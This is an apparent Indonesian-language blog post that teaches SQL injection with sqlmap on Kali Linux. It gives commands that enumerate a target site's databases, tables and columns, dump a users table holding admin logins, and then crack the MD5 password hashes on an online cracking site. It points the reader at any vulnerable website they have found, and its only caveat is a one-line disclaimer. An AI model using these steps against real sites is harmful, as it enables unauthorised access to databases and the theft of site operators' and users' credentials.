Assalamualaikum
Seperti gambar di atas itu adalah hasil dari sql injection dengan sqlmap di kali linux
Bagaimana cara menggunakanNya saya akan membagikan tutorialNya
oke langsung saja
1. Buka Terminal anda
Ketikan perintah seperti berikut
sqlmap -u http://target.com/news.php?id=12 --dbs
#~ http://target.com/news.php?id=12 bisa di ganti web vuln sql yang sudah ente siapkan
#~ --dbs : melihat nama database website
#~ -u : target url
2.Jika sudah,akan tampil nama database websiteNya contoh disini ada nama database info_web kita akan meihat tabel dan kolomNya dengan menggunakan perintah sebagai berikut:
sqlmap -u http://target.com/news.php?id=12 --dbs -D info_web --tables -> untuk melihat tabel
sqlmap -u http://target.com/news.php?id=12 --dbs -D info_web --columns -> untuk melihat kolom
#~ -D : Nama Database
3. Jika sukses, akan muncul nama tabelNya cari tabel yang berkaitan dengan admin login contoh di sini ada tabel users kita dump isiNya menggunakan perintah
sqlmap -u http://target.com/news.php?id=12 --dbs -D info_web --tables users --dump
#~ --dump : untuk melihat isi tabel
4.Dan tunggu sampai selesai.. disitu akan muncul username dan password. passwordNya berbentuk md5 bisa anda crack di hashkiller.co.uk atau web md5crack yang lain
#~ Hanya Tutorial, kami tidak mensarankan anda merusak web!
.
0 comments:
Post a Comment